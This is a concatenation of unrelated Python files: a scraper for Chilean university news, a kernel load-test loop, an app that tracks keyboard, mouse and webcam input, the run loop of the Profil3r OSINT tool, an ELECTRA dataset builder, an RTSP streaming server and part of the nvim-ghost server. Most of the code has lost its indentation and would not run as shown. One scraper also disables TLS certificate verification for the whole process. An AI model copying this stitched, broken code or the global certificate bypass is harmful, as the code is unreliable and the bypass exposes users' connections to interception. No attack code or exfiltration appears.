saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Antofagasta
def ua():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UA')
url_rss = "http://www.comunicacionesua.cl/feed/"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
bajada = item['description']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ua")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'qode-post-image'}).img['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de Atacama
def uda():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UDA')
url_rss = "http://www.uda.cl/index.php?option=com_content&view=category&layout=blog&id=15&Itemid=253&format=feed&type=atom"
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
bajada = BeautifulSoup(item['summary'], "html.parser").find('p').text
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "uda")
categoria_busqueda = setCategoria(item['category'])
imagen = "http://www.uda.cl/" + BeautifulSoup(item['summary'], "html.parser").find('img')['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de La Serena
# Región de Coquimbo
def userena():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='USERENA')
url_rss = ['http://www.userena.cl/actualidad-uls.feed?type=rss',
'http://www.userena.cl/cultura-y-extension.feed?type=rss',
'http://www.userena.cl/dgae.feed?type=rss']
feeds = []
for url in url_rss:
feeds.append(feedparser.parse( url ))
for feed in feeds:
for item in feed['items']:
try:
titulo = item['title']
bajada = BeautifulSoup(item['summary'], "html.parser").find_all('p')[2].text
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "userena")
categoria_busqueda = setCategoria(item['category'])
imagen = BeautifulSoup(item['summary'], "html.parser").p.img['src']
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de O'Higgins
def uoh():
# https://www.uoh.cl/
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UOH')
url = 'https://www.uoh.cl/#noticias-y-eventos'
# universidad = Universidad.objects.get(alias='UOH')
# contents = urllib.request.urlopen("https://www.uoh.cl/#noticias-y-eventos").read()
logging.debug('Deteniendo')
# Universidad Católica del Maule
def ucm():
# http://portal.ucm.cl/
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCM')
url_rss = "https://portal.ucm.cl/feed" # URL de feed RSS
feed = feedparser.parse( url_rss ) # Se obtiene el XML y se procesa
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ucm")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'section-content-image'}).img['src']
bajada = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'section-content-paragraph'}).find_all('p')[1].text
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# Universidad de la Frontera
def ufro():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UFRO')
url_rss = 'https://www.ufro.cl/index.php/noticias/12-destacadas?format=feed&type=rss'
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "ufro")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
imagen = 'https://www.ufro.cl' + BeautifulSoup(noticia, "html.parser").find('td', {'id': 'imagen'}).p.img['src']
bajada = BeautifulSoup(noticia, "html.parser").find('p', {'class': 'bajada'}).text.strip()
if not bajada:
bajada = BeautifulSoup(noticia, "html.parser").find('table', {'class': 'tnoticia'}).tbody.tr.find_all('td')[1].p.text.strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.ufro.cl/
# Universidad Católica de Temuco
def uct():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UCT')
url_base = 'https://www.uct.cl/actualidad/'
contents = urllib.request.urlopen(url_base).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find('div', {'id': 'cardslist'}).find('cards-container')[':cards'].strip()
data = json.loads(items)
for item in data:
try:
titulo = item['title'].replace('“','"').replace('”','"').strip()
link = item['button']['link']
fecha = item['date']
fecha = formatear_fecha(fecha, "uct")
categoria_busqueda = setCategoria(item['cat'])
noticia = urllib.request.urlopen(link).read()
noticia_bs = BeautifulSoup(noticia, "html.parser")
try:
imagen = item['image']['src']
if imagen is None:
imagen = noticia_bs.find('div', {'class': 'wysiwyg'}).find('img')['src']
except Exception as e:
imagen = ''
bajada = noticia_bs.find('div', {'class': 'wysiwyg'}).find('p').text.replace('“','"').replace('”','"').strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.uct.cl/
# Universidad Austral de Chile
def uach():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UACH')
url_rss = 'https://diario.uach.cl/feed/'
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "uach")
categoria_busqueda = setCategoria(item['category'])
noticia = urllib.request.urlopen(link).read()
noticia_bs = BeautifulSoup(noticia, "html.parser")
imagen = noticia_bs.find('article', {'class': 'post'}).find('div', {'class': 'post-image'}).a['href'].strip()
bajada = noticia_bs.find('p', {'class': 'bajada'}).text.replace('“','"').replace('”','"').strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.uach.cl/
# Universidad de Aysén
def uaysen():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UAYSEN')
url = 'https://uaysen.cl/actualidad/noticias'
contents = urllib.request.urlopen(url).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("div", {"class": "mb-4 col-xl-4 col-lg-4 col-md-6 col-sm-12"})
for item in items:
try:
titulo = item.div.a.text.strip()
link = item.div.find("a")['href']
fecha = item.find("small", {"class": "date"}).text.strip()
fecha = formatear_fecha(fecha, "uaysen")
categoria_busqueda = setCategoria(item.find("ul", {"class": "list-inline"}).li.a.text.strip())
imagen = item.find("div", {"class": "image-news-container-small"}).img['src']
noticia = urllib.request.urlopen(link).read()
noticia_bs = BeautifulSoup(noticia, "html.parser")
bajada = noticia_bs.find("div", {"class": "text-justify font-weight-bold mb-3"}).text.strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://uaysen.cl/
pass
# Universidad de Magallanes
def umag():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UMAG')
url = 'http://www.umag.cl/vcm/?page_id=459'
contents = urllib.request.urlopen(url).read()
bs = BeautifulSoup(contents, "html.parser")
items = bs.find_all("div", {"class": "not-col11"})
for item in items:
try:
link = item.find('a', {'class': 'link'})['href']
noticia = urllib.request.urlopen(link).read()
bs_noticia = BeautifulSoup(noticia, "html.parser")
titulo = bs_noticia.find('div', {'class': 'post-title'}).h2.a.text.strip()
fecha = bs_noticia.find('span', {'class': 'post-dates'}).text.strip()
fecha = formatear_fecha(fecha, "umag")
categoria_busqueda = setCategoria('')
try:
imagen = bs_noticia.find('div', {'class': 'entry'}).find('a').find('img')['src']
except:
imagen = ''
bajada = bs_noticia.find('div', {'class': 'entry'}).p.text.strip()
if not bajada:
bajada = bs_noticia.find('div', {'class': 'entry'}).find_all('p')[2].text.strip()
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# http://www.umag.cl/
# Universidad de Tarapacá
def uta():
logging.debug('Lanzado')
universidad = Universidad.objects.get(alias='UTA')
url_rss = 'https://www.uta.cl/index.php/feed/'
feed = feedparser.parse( url_rss )
for item in feed['items']:
try:
titulo = item['title']
link = item['link']
fecha = item['published']
fecha = formatear_fecha(fecha, "uta")
try:
categoria_busqueda = setCategoria(item['category'])
except:
categoria_busqueda = setCategoria()
bajada = item['summary'].strip()
noticia = urllib.request.urlopen(link).read()
try:
imagen = BeautifulSoup(noticia, "html.parser").find('div', {'class': 'wp-block-image'}).figure.a.img['src']
except:
try:
imagen = BeautifulSoup(noticia, "html.parser").find('figure', {'class': 'wp-block-image'}).a.img['src']
except:
imagen = ''
saveNew({'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
except Exception as e:
result.append({'status':"error", 'error_message':e, 'universidad':universidad, 'titulo':titulo, 'bajada':bajada, 'fecha':fecha, 'link_noticia':link, 'link_recurso':imagen, 'categoria':categoria_busqueda})
logging.debug('Deteniendo')
# https://www.uta.cl/
|
load.py
|
import threading
import datetime
import time

import requests

# NOTE: the import for KernelLauncher was missing in the original file; it is
# assumed to be provided by the gateway/kernel client library used in this
# environment.
kid = []
n = 10
delay_s = 10
launcher = KernelLauncher('lresende-elyra:8888')
def start_kernel():
try:
id = launcher.launch('spark_python_yarn_cluster')
print('Kernel {} started'.format(id))
kid.append(id)
    except RuntimeError as re:
        print('Failed to start kernel: {}'.format(re))
        print('')
def stop_kernel(id):
try:
print('Stopping kernel {}'.format(id))
launcher.shutdown(id)
    except RuntimeError as re:
        print('Failed to stop kernel {}: {}'.format(id, re))
        print('')
def log_with_time(message):
time = datetime.datetime.now().strftime("[%d-%m-%Y %I:%M:%S.%f %p]")
print("{} {}".format(time, message))
threads = []
log_with_time("Starting")
while True:
threads.clear()
kid.clear()
for i in range(0,n):
t = threading.Thread(target=start_kernel)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
threads.clear()
print()
log_with_time("All kernels started...")
print()
time.sleep(delay_s)
requests.get('http://lresende-elyra:8888/api/kernels')
log_with_time("Starting kernel shutdown...")
print()
for i in range(0,n):
t = threading.Thread(target=stop_kernel, args=(kid[i],))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
print()
log_with_time("All kernels stopped...")
print()
time.sleep(delay_s)
log_with_time("ending")
exit(0)
# NOTE: the block below is an earlier, sequential variant; it is unreachable
# given the loop/exit(0) above and is kept only for reference.
for i in range(0,n):
print('Starting kernel {}'.format(i))
try:
id = launcher.launch('spark_python_yarn_cluster')
kid.append(id)
print('Kernel {} started'.format(kid[i]))
except:
print('Failed to start kernel {}'.format(i))
print('')
time.sleep(30)
for i in range(0,n):
print('Stopping kernel {}'.format(i))
try:
launcher.shutdown(kid[i])
print('Kernel {} stopped'.format(kid[i]))
except:
print('Failed to stop kernel {}'.format(i))
print('')
|
main.py
|
#!/usr/bin/sudo python3
import threading
from db.processed_signals_db import *
from db.signals_db import *
from db.timer import Timer
from db.video_data_db import *
from device_tracking.mouse_tracker import MouseTracker
from device_tracking.keyboard_tracker import KeyboardTracker
from device_tracking.pythonic_video_tracker import PythonicVideoTracker
from models.DNN_model import DNNModel
from models.Keras_pb_model import KerasPBModel
from GUI.WebUI import WebWindow
import os
# for Linux (maybe even MacOS):
# sudo pyinstaller main.py --noconsole --onefile --add-data GUI:GUI --hidden-import="pynput" --exclude-module tensorflow
# for windows:
# pyinstaller main.py --noconsole --onefile --add-data "GUI;GUI" --exclude-module tensorflow
DEBUG = True
USE_GUI = False
if __name__ == "__main__":
if not os.path.exists("db"):
os.mkdir("db")
if not os.path.exists('db/signals.sqlite'):
prepare_signal_db()
prepare_imageDB()
prepare_processed_signalDB()
kb_tracker = KeyboardTracker(DEBUG)
kb_tracker.track()
mouse_tracker = MouseTracker(DEBUG)
mouse_tracker.track()
timer = threading.Thread(target=Timer.start_timer, daemon=True)
timer.start()
# Video tracker
video_tracker = PythonicVideoTracker(
source=0,
debug=DEBUG,
models=[DNNModel(DEBUG), KerasPBModel(DEBUG)]
)
w = WebWindow(
video_tracker=video_tracker,
mouse_tracker=mouse_tracker,
kb_tracker=kb_tracker
)
w.create_window()
|
_run.py
|
from profil3r.app.core.colors import Colors
import threading
def run(self):
self.load_config()
self.print_logo()
# Get arguments from the command line
self.parse_arguments()
self.menu()
self.get_permutations()
# Number of permutations to test per service
print(Colors.BOLD + "[+]" + Colors.ENDC + " {} permutations to test for each service, you can reduce this number by selecting less options if it takes too long".format(len(self.permutations_list)))
modules = self.get_report_modules()
print("\n" + "Profil3r will search : \n " + Colors.BOLD + "[+] " + Colors.ENDC + "{} \n".format(str('\n ' + Colors.BOLD + "[+] " + Colors.ENDC).join(modules)))
    # NOTE: each module thread is join()ed immediately after start(), so the
    # modules effectively run one after another rather than concurrently.
    for module in modules:
        thread = threading.Thread(target=self.modules[module]["method"])
        thread.start()
        thread.join()
if self.report_path:
self.generate_report()
|
build_openwebtext_pretraining_dataset.py
|
# coding=utf-8
"""Preprocessess the Open WebText corpus for pre-training."""
import argparse
import multiprocessing
import os
import random
import tarfile
import time
import tensorflow.compat.v1 as tf
import build_pretraining_dataset
from util import utils
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
job_tmp_dir = os.path.join(args.data_dir, "tmp", "job_" + str(job_id))
owt_dir = os.path.join(args.data_dir, "openwebtext")
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = build_pretraining_dataset.ExampleWriter(
job_id=job_id,
vocab_file=os.path.join(args.data_dir, "vocab.txt"),
output_dir=os.path.join(args.data_dir, "pretrain_tfrecords"),
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=False,
strip_accents=args.strip_accents,
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(owt_dir))
fnames = [f for (i, f) in enumerate(fnames)
if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0 and file_no % 10 == 0:
elapsed = time.time() - start_time
log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written))
utils.rmkdir(job_tmp_dir)
with tarfile.open(os.path.join(owt_dir, fname)) as f:
f.extractall(job_tmp_dir)
extracted_files = tf.io.gfile.listdir(job_tmp_dir)
random.shuffle(extracted_files)
for txt_fname in extracted_files:
example_writer.write_examples(os.path.join(job_tmp_dir, txt_fname))
example_writer.finish()
log("Done!")
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--data-dir", required=True,
help="Location of data (vocab file, corpus, etc).")
parser.add_argument("--max-seq-length", default=128, type=int,
help="Number of tokens per example.")
parser.add_argument("--num-processes", default=1, type=int,
help="Parallelize across multiple processes.")
  # Flags to toggle accent stripping; stripping accents is the default behavior.
parser.add_argument("--do-strip-accents", dest='strip_accents',
action='store_true', help="Strip accents (default).")
parser.add_argument("--no-strip-accents", dest='strip_accents',
action='store_false', help="Don't strip accents.")
parser.set_defaults(strip_accents=True)
args = parser.parse_args()
utils.rmkdir(os.path.join(args.data_dir, "pretrain_tfrecords"))
if args.num_processes == 1:
write_examples(0, args)
else:
jobs = []
for i in range(args.num_processes):
job = multiprocessing.Process(target=write_examples, args=(i, args))
jobs.append(job)
job.start()
for job in jobs:
job.join()
if __name__ == "__main__":
main()
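# Example invocation (the data path and process count are illustrative
# assumptions): the script expects vocab.txt and an openwebtext/ directory of
# tar archives under --data-dir, and writes TFRecords to pretrain_tfrecords/.
#   python build_openwebtext_pretraining_dataset.py \
#       --data-dir /path/to/electra_data --num-processes 4 --max-seq-length 128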
|
ServerWorker.py
|
from random import randint
import sys, traceback, threading, socket
from VideoStream import VideoStream
from RtpPacket import RtpPacket
class ServerWorker:
SETUP = 'SETUP'
PLAY = 'PLAY'
PAUSE = 'PAUSE'
TEARDOWN = 'TEARDOWN'
INIT = 0
READY = 1
PLAYING = 2
state = INIT
OK_200 = 0
FILE_NOT_FOUND_404 = 1
CON_ERR_500 = 2
clientInfo = {}
def __init__(self, clientInfo):
self.clientInfo = clientInfo
def run(self):
threading.Thread(target=self.recvRtspRequest).start()
def recvRtspRequest(self):
"""Receive RTSP request from the client."""
connSocket = self.clientInfo['rtspSocket'][0]
        while True:
            data = connSocket.recv(256)
            if data:
                print("Data received:\n" + data.decode("utf-8"))
                self.processRtspRequest(data.decode("utf-8"))
            else:
                # Client closed the RTSP connection
                break
def processRtspRequest(self, data):
"""Process RTSP request sent from the client."""
# Get the request type
request = data.split('\n')
line1 = request[0].split(' ')
requestType = line1[0]
# Get the media file name
filename = line1[1]
# Get the RTSP sequence number
seq = request[1].split(' ')
# Process SETUP request
if requestType == self.SETUP:
if self.state == self.INIT:
# Update state
print("processing SETUP\n")
try:
self.clientInfo['videoStream'] = VideoStream(filename)
self.state = self.READY
except IOError:
self.replyRtsp(self.FILE_NOT_FOUND_404, seq[1])
# Generate a randomized RTSP session ID
self.clientInfo['session'] = randint(100000, 999999)
# Send RTSP reply
self.replyRtsp(self.OK_200, seq[1])
# Get the RTP/UDP port from the last line
self.clientInfo['rtpPort'] = request[2].split(' ')[3]
# Process PLAY request
elif requestType == self.PLAY:
if self.state == self.READY:
print("processing PLAY\n")
self.state = self.PLAYING
# Create a new socket for RTP/UDP
self.clientInfo["rtpSocket"] = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.replyRtsp(self.OK_200, seq[1])
# Create a new thread and start sending RTP packets
self.clientInfo['event'] = threading.Event()
self.clientInfo['worker']= threading.Thread(target=self.sendRtp)
self.clientInfo['worker'].start()
# Process PAUSE request
elif requestType == self.PAUSE:
if self.state == self.PLAYING:
print("processing PAUSE\n")
self.state = self.READY
self.clientInfo['event'].set()
self.replyRtsp(self.OK_200, seq[1])
# Process TEARDOWN request
elif requestType == self.TEARDOWN:
print("processing TEARDOWN\n")
self.clientInfo['event'].set()
self.replyRtsp(self.OK_200, seq[1])
# Close the RTP socket
self.clientInfo['rtpSocket'].close()
def sendRtp(self):
"""Send RTP packets over UDP."""
while True:
self.clientInfo['event'].wait(0.05)
# Stop sending if request is PAUSE or TEARDOWN
            if self.clientInfo['event'].is_set():
break
data = self.clientInfo['videoStream'].nextFrame()
if data:
frameNumber = self.clientInfo['videoStream'].frameNbr()
try:
address = self.clientInfo['rtspSocket'][1][0]
port = int(self.clientInfo['rtpPort'])
self.clientInfo['rtpSocket'].sendto(self.makeRtp(data, frameNumber),(address,port))
except:
print("Connection Error")
#print('-'*60)
#traceback.print_exc(file=sys.stdout)
#print('-'*60)
def makeRtp(self, payload, frameNbr):
"""RTP-packetize the video data."""
version = 2
padding = 0
extension = 0
cc = 0
marker = 0
pt = 26 # MJPEG type
seqnum = frameNbr
ssrc = 0
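        # These values correspond to the standard RTP header fields (RFC 3550):
        # version/padding/extension/CSRC count, marker and payload type
        # (26 = motion JPEG), the sequence number (reused here as the frame
        # number), and the SSRC identifier. How they are packed into the
        # 12-byte header is delegated to RtpPacket.encode().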
rtpPacket = RtpPacket()
rtpPacket.encode(version, padding, extension, cc, seqnum, marker, pt, ssrc, payload)
return rtpPacket.getPacket()
def replyRtsp(self, code, seq):
"""Send RTSP reply to the client."""
if code == self.OK_200:
#print("200 OK")
reply = 'RTSP/1.0 200 OK\nCSeq: ' + seq + '\nSession: ' + str(self.clientInfo['session'])
connSocket = self.clientInfo['rtspSocket'][0]
connSocket.send(reply.encode())
# Error messages
elif code == self.FILE_NOT_FOUND_404:
print("404 NOT FOUND")
elif code == self.CON_ERR_500:
print("500 CONNECTION ERROR")
|
binary.py
|
import json
import os
import random
import signal
import socket
import sys
import tempfile
import threading
import time
import urllib.parse
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from typing import Dict
from typing import List
from typing import Optional
import pynvim
import requests
from simple_websocket_server import WebSocket
from simple_websocket_server import WebSocketServer
BUILD_VERSION: str = "v0.1.1"
# TEMP_FILEPATH is used to store the port of the currently running server
TEMP_FILEPATH: str = os.path.join(tempfile.gettempdir(), "nvim-ghost.nvim.port")
WINDOWS: bool = os.name == "nt"
LOCALHOST: str = "127.0.0.1" if WINDOWS else "localhost"
LOGGING_ENABLED: bool = bool(os.environ.get("NVIM_GHOST_LOGGING_ENABLED", False))
SUPER_QUIET: bool = bool(os.environ.get("NVIM_GHOST_SUPER_QUIET", False))
neovim_focused_address: Optional[str] = os.environ.get("NVIM_LISTEN_ADDRESS", None)
_ghost_port: str = os.environ.get("GHOSTTEXT_SERVER_PORT", "4001")
if not _ghost_port.isdigit():
if neovim_focused_address is not None:
with pynvim.attach("socket", path=neovim_focused_address) as nvim_handle:
if not SUPER_QUIET:
nvim_handle.command(
"echom '[nvim-ghost] Invalid port. "
"Please set $GHOSTTEXT_SERVER_PORT to a valid port.'"
)
sys.exit("Port must be a number")
GHOST_PORT: int = int(_ghost_port)
# chdir to folder containing binary
# otherwise the logs are generated wherever the server was started from (i.e. curdir)
# which..... isn't good. You'd have stdout.log and stderr.log files everywhere!
os.chdir(os.path.dirname(os.path.abspath(sys.argv[0])))
# we use sys.argv[0] because __file__ doesn't give proper results with pyinstaller
# See: https://stackoverflow.com/a/53511380
def get_neovim_handle() -> pynvim.Nvim:
return pynvim.attach("socket", path=neovim_focused_address)
def _port_occupied(port) -> bool:
"""
If port is occupied, returns True. Else returns False
:param port int: port number to check
"""
port = int(port)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as socket_checker:
return socket_checker.connect_ex((LOCALHOST, port)) == 0
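# Example (assumed port number): _port_occupied(4001) returns True if something
# is already listening on 127.0.0.1:4001, and False otherwise.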
def _detect_running_port() -> Optional[int]:
"""
Checks whether the server is already running. If yes, returns the port it
is running on.
:rtype Optional[int]: Port number of server (if running), else None
"""
if os.path.exists(TEMP_FILEPATH):
with open(TEMP_FILEPATH) as file:
old_port = file.read()
try:
response = requests.get(f"http://{LOCALHOST}:{old_port}/is_ghost_binary")
if response.ok and response.text == "True":
return int(old_port)
except requests.exceptions.ConnectionError:
return
def _get_running_version(port) -> Optional[str]:
"""
Fetch the version of the currently running server
:param port int: The port number the server is running on
:rtype Optional[str]: Version of the running server
"""
response = requests.get(f"http://{LOCALHOST}:{port}/version")
if response.ok:
return response.text
def store_port():
"""
Store the port number of Server in TEMP_FILEPATH
"""
with open(TEMP_FILEPATH, "w+") as file:
file.write(str(servers.http_server.server_port))
def exit_if_server_already_running():
running_port = _detect_running_port()
if running_port is not None:
if running_port == GHOST_PORT:
if _get_running_version(running_port) == BUILD_VERSION:
print("Server already running")
if neovim_focused_address is not None:
with get_neovim_handle() as handle:
if not SUPER_QUIET:
handle.command("echom '[nvim-ghost] Server running'")
sys.exit()
# Server is outdated. Stop it.
requests.get(f"http://{LOCALHOST}:{running_port}/exit")
# Wait till the server has stopped
while True:
if not _port_occupied(running_port):
break
class ArgParser:
"""
Parser for cli arguments.
"""
def __init__(self):
self.argument_handlers = {
"--enable-logging": self._enable_logging,
"--version": self._version,
"--help": self._help,
}
# GET requests to make to the running server
self.server_requests = []
def parse_args(self, args: List[str] = sys.argv[1:]):
for index, argument in enumerate(args):
if argument in self.argument_handlers:
self.argument_handlers[argument]()
def _version(self):
print(BUILD_VERSION)
sys.exit()
def _help(self):
for item in self.argument_handlers:
print(item)
sys.exit()
def _enable_logging(self):
global LOGGING_ENABLED
LOGGING_ENABLED = True
class GhostHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
parsed_url = urllib.parse.urlparse(self.path)
path = parsed_url.path
query = parsed_url.query
responses_nodata = {
"/": self._ghost_responder,
"/version": self._version_responder,
"/exit": self._exit_responder,
"/is_ghost_binary": self._sanity_check_responder,
}
responses_data = {
"/focus": self._focus_responder,
"/session-closed": self._session_closed_responder,
}
if path in responses_nodata:
responses_nodata[path]()
if path in responses_data:
responses_data[path](query)
def _ghost_responder(self):
"""
The actual part. The browser extension is calling us.
"""
if neovim_focused_address is None:
# There's no neovim instance to handle our request
return
# In f-strings, to insert literal {, we need to escape it using another {
# So {{ translates to a single literal {
payload = f"""\
{{
"ProtocolVersion": 1,
"WebSocketPort": {servers.websocket_server.port}
}}"""
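# The payload above therefore looks like this (the port number is hypothetical):
#   {"ProtocolVersion": 1, "WebSocketPort": 34567}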
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write(payload.encode("utf-8"))
# NOTE: We didn't use _respond because it sets Content-Type to
# text/plain, but the protocol mentions that the Content-Type should be
# application/json
def _version_responder(self):
"""
Somebody wants to check the version of the running server
"""
self._respond(BUILD_VERSION)
def _exit_responder(self):
"""
We have been told to exit
"""
self._respond("Exiting...")
print(time.strftime("[%H:%M:%S]:"), "Received /exit")
global stop_servers
stop_servers()
def _sanity_check_responder(self):
"""
Somebody wants to check if this is _actually_ the correct server
"""
self._respond("True")
def _focus_responder(self, query_string):
"""
A neovim instance is reporting that it has gained focus
:param query_string str: The query part of the URL
"""
_, address = urllib.parse.parse_qsl(query_string)[0]
self._respond(address)
global neovim_focused_address
if neovim_focused_address != address:
neovim_focused_address = address
print(time.strftime("[%H:%M:%S]:"), f"Focus {address}")
def _session_closed_responder(self, query_string):
"""
A neovim instance is reporting that it has been closed
:param query_string str: The query part of the URL
"""
_, address = urllib.parse.parse_qsl(query_string)[0]
self._respond(address)
print(time.strftime("[%H:%M:%S]:"), f"{address} session closed")
global WEBSOCKET_PER_NEOVIM_ADDRESS
if address in WEBSOCKET_PER_NEOVIM_ADDRESS:
for websocket in WEBSOCKET_PER_NEOVIM_ADDRESS[address]:
websocket.close()
del WEBSOCKET_PER_NEOVIM_ADDRESS[address]
global neovim_focused_address
if address == neovim_focused_address:
neovim_focused_address = None
def _respond(self, text):
"""
Send text response with Content-Type text/plain
:param text str: Text to send
"""
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(text.encode("utf-8"))
class GhostWebSocket(WebSocket):
# New message received
def handle(self):
# Log
print(time.strftime("[%H:%M:%S]:"), f"{self.address[1]} got", self.data)
# Extract the data
data = json.loads(self.data)
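# A sketch of the incoming message this handler relies on; the values shown
# are hypothetical, only the "syntax", "url" and "text" keys are assumed
# from the code below:
#   {"syntax": "markdown", "url": "example.com", "text": "hello world"}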
filetype = data["syntax"]
url = data["url"]
text = data["text"]
text_split = text.split("\n")
# Set the buffer text
neovim_handle = self.neovim_handle
buffer_handle = self.buffer_handle
neovim_handle.api.buf_set_lines(buffer_handle, 0, -1, 0, text_split)
